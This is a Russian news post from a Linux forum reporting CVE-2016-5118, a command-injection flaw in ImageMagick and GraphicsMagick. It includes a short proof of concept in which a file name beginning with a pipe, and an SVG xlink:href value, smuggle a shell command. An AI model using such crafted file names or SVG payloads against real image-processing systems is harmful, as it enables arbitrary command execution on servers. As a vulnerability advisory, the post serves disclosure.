LINUX.ORG.RU

Уязвимость


29

0

Всего сообщений: 110

См. также:

 , , , , , , , , ,

Ещё одна критическая уязвимость в ImageMagick

Группа Безопасность

В ImageMagick и GraphicMagick обнаружена ещё одна уязвимость (CVE-2016-5118), приводящая к выполнению произвольных shell-команд при обработке файлов со специальными именами. Уязвимость заключается в отсутствии проверки имени файлов на наличие недопустимых символов:

% rm -f hello.txt
% convert '|echo Hello > hello.txt;' null:
% ls hello.txt
hello.txt

Как и в случае с предыдущей уязвимостью, возможна атака с помощью специально сформированных SVG-файлов (которые позволяют указывать внутри себя ссылки на другие файлы):

xlink:href="|echo Hello > hello.txt; cat /usr/lib/firefox/browser/icons/mozicon128.png">

>>> Подробности

 , ,

anonymous ()

Еще новости

Май 2016

Апрель 2016

Март 2016

Февраль 2016

Январь 2016

Сентябрь 2015

Август 2015

Июль 2015

2015

Форум

Июль 2016

Март 2016

Сентябрь 2015

Август 2015

Июль 2015

2015

2015

2014

2013

2012